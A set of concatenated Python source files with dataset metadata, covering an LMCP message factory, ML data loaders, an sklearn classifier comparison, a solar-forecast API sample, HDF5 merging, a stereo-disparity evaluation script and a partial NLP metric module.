HEADER_SIZE:\n print(\"getObject() : buffer too small for message\")\n return None\n type = getLMCPType(buffer)\n series = getLMCPSeries(buffer)\n version = getLMCPVersion(buffer)\n obj = self.createObject(series, version, type)\n if obj != None:\n obj.unpack(buffer, HEADER_SIZE + 15)\n return obj\n\n def getObjFromStream(self, fileobj):\n \"\"\"\n reads an LMCP object from a file source, such as a socket (or file on the disk)\n \"\"\"\n header = fileobj.read(HEADER_SIZE)\n msgSize = getSize(header)\n msgBody = fileobj.read(msgSize + CHECKSUM_SIZE)\n if validate(header + msgBody) != True:\n print(\"LMCPFactory : bad checksum. \")\n return None\n return self.getObject(header + msgBody)\n\n def createObject(self, series_id, version, object_type):\n if series_id in self.series_enums.keys():\n series_enum = self.series_enums[series_id]\n\n if series_enum.SERIES_VERSION == version:\n return series_enum.SeriesEnum().getInstance(object_type)\n\n\n return None\n\n def createObjectByName(self, name):\n \"\"\"\n Returns a new LMCP object based on its name\n \"\"\"\n return None\n\n def unpackFromXMLNode(self, domNode):\n \"\"\"\n Reads in an XML node, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n objs = []\n for e in domNode.childNodes:\n if e.nodeType == xml.dom.Node.ELEMENT_NODE:\n obj = self.createObjectByName(e.localName)\n if obj != None:\n obj.unpackFromXMLNode(e, self)\n objs.append(obj)\n return objs\n\n def createObjectFromNode(self, xmlNode):\n return None\n\n def unpackFromXMLString(self, xmlStr):\n \"\"\"\n Reads in an XML string, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n doc = xml.dom.minidom.parseString(xmlStr)\n return self.unpackFromXMLNode(doc.documentElement)\n\n def unpackFromXMLFile(self, file):\n \"\"\"\n Reads in an XML document, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n doc = xml.dom.minidom.parse(file)\n return self.unpackFromXMLNode(doc.documentElement)\n\ninternalFactory = LMCPFactory()\n\ndef packMessage(lmcpObject, calcChecksum):\n \"\"\"\n packs a buffer (string) object and returns it\n \"\"\"\n\n if lmcpObject == None:\n return None\n # pack the header\n hdr_buffer = []\n obj_buffer = []\n cks_buffer = []\n total_buffer = []\n hdr_buffer.append(struct.pack(\">I\", LMCP_CONTROL_STR))\n obj_tmp = lmcpObject.pack()\n obj_buffer.append(struct.pack(\">B\", lmcpObject != None))\n obj_buffer.append(struct.pack(\">q\", lmcpObject.SERIES_NAME_ID))\n obj_buffer.append(struct.pack(\">I\", lmcpObject.LMCP_TYPE))\n obj_buffer.append(struct.pack(\">H\", lmcpObject.SERIES_VERSION))\n obj_buffer.append(obj_tmp)\n hdr_buffer.append(struct.pack(\">I\", len(\"\".join(obj_buffer))))\n total_buffer.extend(hdr_buffer)\n total_buffer.extend(obj_buffer)\n\n #pack the checksum\n if calcChecksum:\n total_buffer.append(struct.pack(\">I\", calculateChecksum(\"\".join(total_buffer), 0)))\n else:\n total_buffer.append(struct.pack(\">I\", 0))\n\n return \"\".join(total_buffer)\n\ndef getSize(buffer):\n return struct.unpack_from(\">I\", buffer, 4)[0]\n\ndef getLMCPValidObject(buffer):\n return struct.unpack_from(\">B\", buffer, 8)[0]\n\ndef getLMCPSeries(buffer):\n return struct.unpack_from(\">q\", buffer, 9)[0]\n\ndef getLMCPType(buffer):\n return struct.unpack_from(\">I\", buffer, 17)[0]\n\ndef getLMCPVersion(buffer):\n return struct.unpack_from(\">H\", buffer, 21)[0]\n\ndef calculateChecksum(buffer, offset):\n \"\"\"\n Calculates the checksum. This should be called after pack().\n The checksum sums all bytes in the packet between 0 and\n buf.limit() - CHECKSUM_SIZE.\n \"\"\"\n sum = 0\n for x in range(len(buffer)-offset):\n sum += struct.unpack_from(\"b\", buffer, x)[0] & 0xFF\n return sum\n\ndef validate(buffer):\n \"\"\"\n checks the bytebuffer's checksum value against the calculated checksum\n returns true if the calculated and stored values match, or if the buffer value is\n zero (indicating that checksum was not calculated. This method rewinds the buffer and\n returns it to LIMIT - 4 bytes (start position of checksum)\n \"\"\"\n cs = struct.unpack_from(\">I\", buffer, len(buffer)-5)[0]\n if cs == 0:\n return True\n else:\n return cs == calculateChecksum(buffer, 5)\n\n\n","sub_path":"concept/auto_generated/lmcp/LMCPFactory.py","file_name":"LMCPFactory.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358594312","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\n\nclass DataFrame(object):\n\n\n def __init__(self,\n path_to_input_file,\n number_of_output_neurons\n ):\n\n\n array = np.load(path_to_input_file)\n\n\n self._data = array[:, number_of_output_neurons:-1]\n self._event_weights = array[:, -1]\n\n if number_of_output_neurons == 1:\n self._labels = array[:, 0]\n else:\n self._labels = array[:, :number_of_output_neurons]\n\n\n self._number_of_events = self._data.shape[0]\n self._number_of_variables = self._data.shape[1]\n\n\n\n\n def get_data_labels_event_weights_as_batches(self,\n batch_size,\n sort_events_randomly,\n include_smaller_last_batch\n ):\n\n\n if sort_events_randomly:\n permutation = np.random.permutation(self._number_of_events)\n\n else:\n permutation = np.array(range(self._number_of_events))\n\n\n current_index = 0\n while (current_index + batch_size <= self._number_of_events):\n batch_indices = permutation[current_index : current_index+batch_size]\n\n current_index += batch_size\n\n yield (self._data [batch_indices],\n self._labels [batch_indices],\n self._event_weights[batch_indices]\n )\n\n\n if include_smaller_last_batch:\n if current_index < self._number_of_events:\n batch_indices = permutation[current_index :]\n \n yield (self._data [batch_indices],\n self._labels [batch_indices],\n self._event_weights[batch_indices]\n )\n\n\n\n\n def get_data(self):\n\n\n return self._data\n\n\n\n\n def get_data_labels_event_weights(self):\n\n\n return self._data, self._labels, self._event_weights\n\n\n\n\n def get_labels_event_weights(self):\n\n\n return self._labels, self._event_weights\n\n\n\n\n def get_number_of_variables(self):\n\n\n return self._number_of_variables\n","sub_path":"NNFlow/data_frame/data_frame.py","file_name":"data_frame.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601919653","text":"from collections import defaultdict\nimport numpy as np\nimport tensorflow as tf\nfrom .download_data import prepare_data\nfrom ..utils.sampling import NegativeSampling\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass DatasetPure:\n def __init__(self, load_builtin_data=\"ml-1m\", par_path=None):\n self.train_user = defaultdict(dict)\n self.train_item = defaultdict(dict)\n self.user2id = dict()\n self.item2id = dict()\n self.id2user = dict()\n self.id2item = dict()\n self.train_user_indices = list()\n self.train_item_indices = list()\n self.train_labels = list()\n self.test_user_indices = list()\n self.test_item_indices = list()\n self.test_labels = list()\n if load_builtin_data == \"ml-1m\":\n prepare_data(par_path, feat=False)\n\n def build_dataset(self, data_path=\"../ml-1m/ratings.dat\", shuffle=True, length=\"all\", sep=\",\",\n user_col=None, item_col=None, label_col=None, split_mode=\"train_test\", threshold=0,\n train_frac=0.8, convert_implicit=False, build_negative=False, build_tf_dataset=False,\n k=1, batch_size=256, seed=42, num_neg=None, lower_upper_bound=None):\n np.random.seed(seed)\n self.batch_size = batch_size\n self.lower_upper_bound = lower_upper_bound\n if isinstance(num_neg, int) and num_neg > 0:\n self.num_neg = num_neg\n if not np.all([user_col, item_col, label_col]):\n self.user_col = 0\n self.item_col = 1\n self.label_col = 2\n\n with open(data_path, 'r') as f:\n loaded_data = f.readlines()\n if shuffle:\n loaded_data = np.random.permutation(loaded_data)\n if length == \"all\":\n length = len(loaded_data)\n if split_mode == \"train_test\":\n self.train_test_split(loaded_data, length, sep, train_frac, convert_implicit,\n build_negative, build_tf_dataset, threshold, num_neg)\n elif split_mode == \"leave_k_out\":\n self.leave_k_out_split(k, loaded_data, length, sep, convert_implicit, shuffle,\n build_negative, threshold, num_neg)\n else:\n raise ValueError(\"split_mode must be either 'train_test' or 'leave_k_out'\")\n\n def train_test_split(self, loaded_data, length, sep=\",\", train_frac=0.8, convert_implicit=False,\n build_negative=False, build_tf_dataset=False, threshold=0, num_neg=None):\n index_user = 0\n index_item = 0\n for i, line in enumerate(loaded_data[:length]):\n user = line.split(sep)[self.user_col]\n item = line.split(sep)[self.item_col]\n label = line.split(sep)[self.label_col]\n if convert_implicit and int(label) > threshold:\n label = 1\n try:\n user_id = self.user2id[user]\n except KeyError:\n user_id = index_user\n self.user2id[user] = index_user\n index_user += 1\n try:\n item_id = self.item2id[item]\n except KeyError:\n item_id = index_item\n self.item2id[item] = index_item\n index_item += 1\n\n if i <= int(train_frac * length):\n self.train_user_indices.append(user_id)\n self.train_item_indices.append(item_id)\n self.train_labels.append(float(label))\n self.train_user[user_id].update(dict(zip([item_id], [float(label)])))\n self.train_item[item_id].update(dict(zip([user_id], [float(label)])))\n else:\n self.test_user_indices.append(user_id)\n self.test_item_indices.append(item_id)\n self.test_labels.append(float(label))\n\n self.train_user_indices = np.array(self.train_user_indices)\n self.train_item_indices = np.array(self.train_item_indices)\n self.train_labels = np.array(self.train_labels)\n\n print(\"testset size before: \", len(self.test_labels))\n test_all = np.concatenate([np.expand_dims(self.test_user_indices, 1),\n np.expand_dims(self.test_item_indices, 1),\n np.expand_dims(self.test_labels, 1)], axis=1)\n test_safe = test_all[(test_all[:, 0] < self.n_users) & (test_all[:, 1] < self.n_items)]\n test_danger = test_all[(test_all[:, 0] >= self.n_users) & (test_all[:, 1] >= self.n_items)]\n self.test_user_indices = test_safe[:, 0].astype(int)\n self.test_item_indices = test_safe[:, 1].astype(int)\n self.test_labels = test_safe[:, 2]\n\n if build_negative:\n self.build_trainset_implicit(num_neg)\n self.build_testset_implicit(num_neg)\n\n if build_tf_dataset:\n self.load_tf_trainset()\n self.load_tf_testset()\n\n print(\"testset size after: \", len(self.test_labels))\n return self\n\n def leave_k_out_split(self, k, loaded_data, length, sep=\",\", convert_implicit=False,\n shuffle=True, build_negative=False, threshold=0, num_neg=None):\n \"\"\"\n leave-last-k-out-split : split k test sample from each user\n :return: dataset\n \"\"\"\n user_indices = list()\n item_indices = list()\n labels = list()\n train_user_indices = list()\n train_item_indices = list()\n train_labels = list()\n test_user_indices = list()\n test_item_indices = list()\n test_labels = list()\n user2id = dict()\n item2id = dict()\n index_user = 0\n index_item = 0\n for i, line in enumerate(loaded_data[:length]):\n user = line.split(sep)[self.user_col]\n item = line.split(sep)[self.item_col]\n label = line.split(sep)[self.label_col]\n if convert_implicit and int(label) > threshold:\n label = 1\n try:\n user_id = user2id[user]\n except KeyError:\n user_id = index_user\n user2id[user] = index_user\n index_user += 1\n try:\n item_id = item2id[item]\n except KeyError:\n item_id = index_item\n item2id[item] = index_item\n index_item += 1\n\n user_indices.append(user_id)\n item_indices.append(item_id)\n labels.append(float(label))\n\n user_indices = np.array(user_indices)\n item_indices = np.array(item_indices)\n labels = np.array(labels)\n\n users, user_position, user_counts = np.unique(user_indices,\n return_inverse=True,\n return_counts=True)\n user_split_indices = np.split(np.argsort(user_position, kind=\"mergesort\"),\n np.cumsum(user_counts)[:-1])\n\n for u in users:\n user_length = len(user_split_indices[u])\n if user_length <= 1 or k == 0:\n train_indices = user_split_indices[u]\n test_indices = []\n elif user_length <= k:\n p = 1\n train_indices = user_split_indices[u][:-p]\n test_indices = user_split_indices[u][-p:]\n else:\n p = k\n train_indices = user_split_indices[u][:-p]\n test_indices = user_split_indices[u][-p:]\n\n train_user_indices.extend(user_indices[train_indices])\n train_item_indices.extend(item_indices[train_indices])\n train_labels.extend(labels[train_indices])\n\n test_user_indices.extend(user_indices[test_indices])\n test_item_indices.extend(item_indices[test_indices])\n test_labels.extend(labels[test_indices])\n\n print(\"testset size before: \", len(test_item_indices))\n train_item_pool = np.unique(train_item_indices)\n mask = np.isin(test_item_indices, train_item_pool) # remove items in test data that are not in train data\n test_user_indices = np.array(test_user_indices)[mask]\n test_item_indices = np.array(test_item_indices)[mask]\n test_labels = np.array(test_labels)[mask]\n print(\"testset size after: \", len(test_item_indices))\n\n self.user2id = dict(zip(set(train_user_indices), np.arange(len(set(train_user_indices)))))\n self.item2id = dict(zip(set(train_item_indices), np.arange(len(set(train_item_indices)))))\n for user, item, label in zip(train_user_indices, train_item_indices, train_labels):\n self.train_user_indices.append(self.user2id[user])\n self.train_item_indices.append(self.item2id[item])\n self.train_labels.append(label)\n\n for test_u, test_i, test_l in zip(test_user_indices, test_item_indices, test_labels):\n self.test_user_indices.append(self.user2id[test_u])\n self.test_item_indices.append(self.item2id[test_i])\n self.test_labels.append(test_l)\n\n if shuffle:\n random_mask = np.random.choice(len(self.train_user_indices), len(self.train_user_indices), replace=False)\n self.train_user_indices = np.array(self.train_user_indices)[random_mask]\n self.train_item_indices = np.array(self.train_item_indices)[random_mask]\n self.train_labels = np.array(self.train_labels)[random_mask]\n else:\n self.train_user_indices = np.array(self.train_user_indices)\n self.train_item_indices = np.array(self.train_item_indices)\n self.train_labels = np.array(self.train_labels)\n\n self.test_user_indices = np.array(self.test_user_indices)\n self.test_item_indices = np.array(self.test_item_indices)\n self.test_labels = np.array(self.test_labels)\n\n for u, i, r in zip(self.train_user_indices, self.train_item_indices, self.train_labels):\n self.train_user[u].update(dict(zip([i], [r])))\n self.train_item[i].update(dict(zip([u], [r])))\n\n if build_negative:\n self.build_trainset_implicit(num_neg)\n self.build_testset_implicit(num_neg)\n\n return self\n\n def build_trainset_implicit(self, num_neg):\n neg = NegativeSampling(self, num_neg, self.batch_size, replacement_sampling=True)\n self.train_user_implicit, \\\n self.train_item_implicit, \\\n self.train_label_implicit = neg(mode=\"train\")\n\n def build_testset_implicit(self, num_neg):\n neg = NegativeSampling(self, num_neg, self.batch_size, replacement_sampling=True)\n self.test_user_implicit, \\\n self.test_item_implicit, \\\n self.test_label_implicit = neg(mode=\"test\")\n\n def load_tf_trainset(self):\n trainset_tf = tf.data.Dataset.from_tensor_slices({'user': self.train_user_indices,\n 'item': self.train_item_indices,\n 'label': self.train_labels})\n self.trainset_tf = trainset_tf.shuffle(len(self.train_labels))\n return self\n\n def load_tf_testset(self):\n testset_tf = tf.data.Dataset.from_tensor_slices({'user': self.test_user_indices,\n 'item': self.test_item_indices,\n 'label': self.test_labels})\n self.testset_tf = testset_tf.filter(lambda x: (x['user'] < self.n_users) & (x['item'] < self.n_items))\n return self\n\n def ratings(self):\n for user, r in self.train_user:\n for item, rating in r.items():\n yield user, item, rating\n\n @property\n def get_id2user(self):\n return {idx: user for user, idx in self.user2id.items()}\n\n @property\n def global_mean(self):\n return np.mean(self.train_labels)\n\n @property\n def n_users(self):\n return len(self.train_user)\n\n @property\n def n_items(self):\n return len(self.train_item)\n\n","sub_path":"libreco/dataset/DatasetPure.py","file_name":"DatasetPure.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331961101","text":"# Ejecuta los modelos con parámetros por defecto sobre unos datos que\n# admite como parámetro. Calcula diferentes scores y los escribe en un\n# csv\nSEED=185\n\nimport numpy as np\nimport os\n\nfrom sklearn.model_selection import KFold\nfrom sklearn import tree\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.metrics import confusion_matrix\n\n# Para calcular la matriz de confusión usando validación cruzada sumamos las matrices obtenidas en las distintas particiones\n# https://stats.stackexchange.com/questions/147175/how-is-the-confusion-matrix-reported-from-k-fold-cross-validation\n# https://stackoverflow.com/questions/40057049/using-confusion-matrix-as-scoring-metric-in-cross-validation-in-scikit-learn\ndef KFoldConfusionMatrix(model, data, target):\n conf_matrix_list_of_arrays = []\n kf = KFold(n_splits=5, shuffle=True, random_state=SEED)\n for train_index, test_index in kf.split(data):\n X_train, X_test = data[train_index], data[test_index]\n y_train, y_test = target[train_index], target[test_index]\n model.fit(X_train, y_train)\n conf_matrix = confusion_matrix(y_test, model.predict(X_test))\n conf_matrix_list_of_arrays.append(conf_matrix)\n return np.sum(conf_matrix_list_of_arrays, axis=0)\n\ndef defaultModelsRun(x, y, name):\n outfilename='results/proc_'+name+'.csv'\n TMPfile='TMP.csv'\n \n table = np.empty((9,10))\n \n # Models:\n dummy=DummyClassifier(strategy='constant',constant=1)\n dt=tree.DecisionTreeClassifier(random_state=SEED)\n gnb=GaussianNB()\n svc=SVC(random_state=SEED)\n rf=RandomForestClassifier(n_jobs=4, random_state=SEED)\n knn=KNeighborsClassifier() # K=5 por defecto\n rn=MLPClassifier(max_iter=500,random_state=SEED) # Max_iter=500 porque recibí warning de convergencia\n models = [dummy, dt, gnb, svc, rf, knn, rn]\n\n for i,m in enumerate(models):\n conf_mat = KFoldConfusionMatrix(m,x,y)\n \"\"\" La matriz de confusión aparece como\n Pred: 0 1\n (Benigno) Real=0: TN FP\n (Maligno) Real=1: FN TP\n \"\"\"\n # Quiero ponerla: TP, TN, FP, FN\n table[i,0:4]=[conf_mat[1,1],conf_mat[0,0],conf_mat[0,1],conf_mat[1,0]]\n\n # Acc\n table[:7,4]=(table[:7,0]+table[:7,1])/(table[:7,0]+table[:7,1]+table[:7,2]+table[:7,3])\n # TPR\n table[:7,5]=table[:7,0]/(table[:7,0]+table[:7,3])\n # FPR\n table[:7,6]=table[:7,2]/(table[:7,1]+table[:7,2])\n # AUC\n table[:7,7]=(1+table[:7,5]-table[:7,6])/2\n # F1-score\n table[:7,8]=2*table[:7,0]/(2*table[:7,0]+table[:7,2]+table[:7,3])\n # G-measure\n table[:7,9]=table[:7,0]/np.sqrt((table[:7,0]+table[:7,2])*(table[:7,0]+table[:7,3]))\n\n # Máximo\n table[7]=np.amax(table[1:7],axis=0)\n # Media\n table[8]=np.mean(table[1:7],axis=0)\n\n np.savetxt(TMPfile, table, delimiter=',', fmt=['%1.1f']*4+['%1.4f']*6)\n\n string=',\"TP\",\"TN\",\"FP\",\"FN\",\"Acc\",\"TPR\",\"FPR\",\"AUC\",\"F1-score\",\"G-measure\"\\n'\n rownames= [\"Dummy\",\"DecisionTree\",\"GaussianNB\",\"SupportVectorM\",\"RandomForest\",\"KNN\",\"NeuralNetwork\",\"Máximo\",\"Media\"]\n with open(TMPfile) as tmp:\n i=0\n for line in tmp:\n string+=rownames[i]+','+line.replace('.0,',',')\n i+=1\n os.remove(TMPfile)\n with open(outfilename,\"w+\") as outf:\n outf.write(string)\n","sub_path":"practica1/modelsDefault.py","file_name":"modelsDefault.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"247889614","text":"import solcast\nimport time\nimport pytz \n\nr = solcast.get_radiation_forecasts(48.438880, 13.333152, hours=24)\nprint(r.next_forecast) # contains the next forecast datapoint\nprint(r.forecasts) # contain the next datapoints for forecast given the hours parameter\n\nr1 = solcast.get_radiation_estimated_actuals(48.438880, 13.333152, hours=24)\nprint(r1.last_estimated) #contains the next forecast datapoint\nprint(r1.estimated_actuals) #contains the next datapoints for forecast given the hours parameter\n\n\n# site_id is in the format xxxx-xxxx-xxxx-xxxx, x being a hexadecimal digit\n#retrieving rooftop forcasts\nr1 = solcast.get_rooftop_forcasts(\"site_id\")\n\nfor x in r1.content['forecasts']:\n\tdt = x['period_end'] \n\tdt = dt.replace(tzinfo=pytz.timezone('UTC'))\n\tdt = dt.astimezone(pytz.timezone(\"your timezone\"))\n\tdt = time.mktime(dt.timetuple())\n\n\tmeasurement = {'power': float(x['pv_estimate']), 'power10': float(x['pv_estimate10']), 'power90': float(x['pv_estimate90']) }\n\t\n\t#dt has the epoch value, and measurements has the forcasts in kW\n\n\n#sending inverter values for rooftop tuning\nmeasurements = []\nslices = 10 #sending data for 10 minutes periods\nfor i in inverter_values: #inverter_values has the data for the actual produced power average in kW\n\ttemp = {}\n\ttemp['total_power'] = str(round(i['power'],3))\n\tj = int(time.mktime(time.strptime(i[\"time\"], \"%Y-%m-%dT%H:%M:%SZ\")))\n\n\ttemp['period_end'] = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime(j + 60 * slices ))\n\ttemp['period'] = 'PT'+str(slices)+'M'\n\tmeasurements.append(temp)\n\nroof = solcast.post_rooftop_measurements(\"site_id\", measurements)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339065461","text":"'''\nInstructions for Use:\nChange the base direc to be where you are working from in the terminal - it should equal thisdir as a sanity check.\nresults_direc is the folder name that the raw_data2 folder is saved into. \n'''\n\nfrom dedalus import public as de\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport h5py\nimport numpy as np\nimport sys\nimport pathlib\nimport os\nfrom dedalus.tools import post\n\n# Getting the current work directory (cwd)\nthisdir = os.getcwd()\n\n#base_direc = \"Users/tomaddison/Desktop/astro_project/MattExplainedCode/\"\nresults_direc = \"Results3j\"\n\n# This is the directory ending (including) raw_data2. Change raw_data2 if that is not the folder where the results are. \ndirec = os.path.join(thisdir, results_direc, \"raw_data2\")\n\n\n# Change this to analysis, run_parameters and snapshots depending on where we are at. \nsection = \"run_parameters\"\n\nspecificdir =os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_run_parameter_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n for file in f:\n if file.endswith(\".h5\"):\n list_of_run_parameter_files.append(os.path.join(r,file))\n print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n#print(list_of_run_parameter_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. \nif len(list_of_run_parameter_files) == 1:\n final_file = list_of_run_parameter_files[0]\n print(final_file)\n # are we just going to pass?\nelif len(list_of_run_parameter_files) == 0:\n print(\"No Run Parameter files found\")\nelse:\n # Do the merge for run_parameters here.\n final_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_run_parameter_files, cleanup=True) \n\n\nsection = \"analysis\"\nspecificdir =specificdir =os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_analysis_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n for file in f:\n if file.endswith(\".h5\"):\n list_of_analysis_files.append(os.path.join(r,file))\n print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n#print(list_of_analysis_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. \nif len(list_of_analysis_files) == 1:\n final_analysis_file = list_of_analysis_files[0]\n print(final_analysis_file)\nelif len(list_of_analysis_files) == 0:\n print(\"No analysis files found\")\nelse:\n # Do the merge for run_parameters here.\n final_analysis_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_analysis_files, cleanup=True)\n\n\n\nsection = \"snapshots\"\nspecificdir =specificdir =os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_snapshot_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n for file in f:\n if file.endswith(\".h5\"):\n list_of_snapshot_files.append(os.path.join(r,file))\n print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n# print(list_of_snapshot_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. \nif len(list_of_snapshot_files) == 1:\n final_snapshot_file = list_of_snapshot_files[0]\n print(final_snapshot_file)\nelif len(list_of_snapshot_files) == 0:\n print(\"No snapshot files found\")\nelse:\n # Do the merge for run_parameters here.\n final_snapshot_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_snapshot_files, cleanup=True) \n","sub_path":"izzy.py","file_name":"izzy.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26144235","text":"import torch.optim as optim\nimport torch\nimport torch.nn.functional as F\nfrom GANet.GANet import GANet\nfrom GANet.GANet_small import GANetSmall\nfrom utils import version_code\nfrom utils.dataset import FlyingThings3D, random_subset, random_split, KITTI_2015\nfrom torch.utils.data import DataLoader, Subset\nimport os\nimport tools\nimport utils\nimport cv2\nimport matplotlib.pyplot as plt\nimport test.model.profile as profile\nimport test\n\nmax_disparity = 192\nversion = 384\nseed = 0\n\ndataset = ['flyingthings3D', 'KITTI_2015']\nimage = ['cleanpass', 'finalpass']\n\nprofile = profile.GDFNet_mdc6()\ndataset = dataset[0]\nimage = image[1]\n\nsave_root = '../../result/{}/{}'.format(profile, dataset)\n\nif dataset == 'flyingthings3D':\n height = int(256 * 1.5)\n width = int(512 * 1.5)\n\nelif dataset == 'KITTI_2015':\n height = int(256)\n width = int(512 * 2)\nelse:\n height = None\n width = None\n raise Exception('Cannot find dataset: ' + dataset)\n\nsgm = utils.SGM(max_disparity=max_disparity, mode=cv2.STEREO_SGBM_MODE_SGBM)\n\nmodel = profile.load_model(max_disparity, version)[1]\nversion, loss_history = profile.load_history(version)\n\nprint('Using model:', profile)\nprint('Using dataset:', dataset)\nprint('Network image size:', (height, width))\nprint('Number of parameters: {:,}'.format(sum(p.numel() for p in model.parameters())))\n\nif model is not None:\n if dataset == 'flyingthings3D':\n test_dataset = FlyingThings3D((height, width), max_disparity, type='test', crop_seed=0, image=image)\n test_dataset = random_subset(test_dataset, 40, seed=seed)\n test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n elif dataset == 'KITTI_2015':\n train_dataset, test_dataset = random_split(KITTI_2015((height, width), type='train', crop_seed=0), seed=seed)\n # test_dataset = KITTI_2015((height, width), type='test', crop_seed=0)\n # test_dataset = random_subset(test_dataset, 100, seed=seed)\n test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n else:\n raise Exception('Cannot find dataset: ' + dataset)\n\n model.eval()\n for batch_index, (X, Y) in enumerate(test_loader):\n with torch.no_grad():\n if isinstance(profile, test.model.profile.GDFNet_mdc6f):\n eval_dict = profile.eval(X, Y, dataset, lr_check=False, candidate=True, regression=True)\n\n elif isinstance(profile, test.model.profile.GDFNet_mdc6):\n eval_dict = profile.eval(X, Y, dataset, lr_check=False, candidate=False, regression=True)\n # eval_dict = profile.eval(X, Y, dataset, lr_check=True, regression=True, penalize=False, slope=1,\n # max_disparity_diff=1.5)\n else:\n eval_dict = profile.eval(X, Y, dataset)\n # utils.plot_image_disparity(X[0], Y[0], disp_model[0], loss_model)\n # exit(0)\n\n if torch.isnan(eval_dict['epe_loss']):\n print('detect loss nan in testing')\n exit(1)\n\n disp_sgm = sgm.process(X)\n Y = Y[:, 0, :, :]\n mask = utils.y_mask(Y, max_disparity, dataset)\n disp_sgm[:, :, :max_disparity] = -1\n mask_sgm = mask & (disp_sgm != -1)\n sgm_loss = utils.EPE_loss(disp_sgm[mask_sgm], Y[mask_sgm])\n\n print('[{}/{}]'.format(batch_index + 1, len(test_loader)))\n print('\\tmodel_loss = {:.3f}'.format(eval_dict['epe_loss']))\n print('\\tsgm_loss = {:.3f}'.format(sgm_loss))\n\n utils.save_comparision(X[0], Y[0], eval_dict['disp'][0], disp_sgm[0], eval_dict['epe_loss'], sgm_loss, save_root,\n 'S{:03d}-B{:03d}.png'.format(seed, batch_index), str(profile))\n","sub_path":"test/model/model_compare.py","file_name":"model_compare.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"44688923","text":"from collections import defaultdict\nfrom typing import Dict, List, Optional, Tuple\n\nimport torch\nfrom rhoknp import Document, Sentence\nfrom seqeval.metrics import accuracy_score, f1_score\nfrom seqeval.scheme import IOB2\n\nfrom kwja.callbacks.utils import convert_predictions_into_tags, set_morphemes\nfrom kwja.datamodule.datasets import CharDataset\nfrom kwja.metrics.base import BaseModuleMetric\nfrom kwja.metrics.utils import unique\nfrom kwja.utils.constants import IGNORE_INDEX, WORD_NORM_OP_TAGS\nfrom kwja.utils.sub_document import extract_target_sentences, to_orig_doc_id\n\n\nclass CharModuleMetric(BaseModuleMetric):\n STATE_NAMES = (\n \"example_ids\",\n \"word_segmentation_predictions\",\n \"word_norm_op_predictions\",\n \"word_norm_op_labels\",\n )\n\n def __init__(self) -> None:\n super().__init__()\n self.dataset: Optional[CharDataset] = None\n self.example_ids: torch.Tensor\n self.word_segmentation_predictions: torch.Tensor\n self.word_norm_op_predictions: torch.Tensor\n self.word_norm_op_labels: torch.Tensor\n\n @staticmethod\n def pad(kwargs: Dict[str, torch.Tensor], max_seq_length: int) -> None:\n for key, value in kwargs.items():\n if key in {\"example_ids\"}:\n continue\n else:\n dims = [1]\n for dim in dims:\n size = [max_seq_length - s if i == dim else s for i, s in enumerate(value.size())]\n if size[dim] == 0:\n continue\n padding = torch.zeros(size, dtype=value.dtype, device=value.device)\n value = torch.cat([value, padding], dim=dim)\n kwargs[key] = value\n\n def compute(self) -> Dict[str, float]:\n sorted_indices = unique(self.example_ids)\n for state_name in self.STATE_NAMES:\n state = getattr(self, state_name)\n setattr(self, state_name, state[sorted_indices])\n\n predicted_documents, gold_documents = self._build_documents()\n\n return {\n **self.compute_word_segmentation_metrics(predicted_documents, gold_documents),\n **self.compute_word_normalization_metrics(self.word_norm_op_predictions, self.word_norm_op_labels),\n }\n\n def _build_documents(self) -> Tuple[List[Document], List[Document]]:\n assert self.dataset is not None, \"dataset isn't set\"\n\n doc_id2predicted_sentences: Dict[str, List[Sentence]] = defaultdict(list)\n doc_id2gold_sentences: Dict[str, List[Sentence]] = defaultdict(list)\n special_ids = set(self.dataset.tokenizer.all_special_ids) - {self.dataset.tokenizer.unk_token_id}\n for example_id, word_segmentation_predictions, 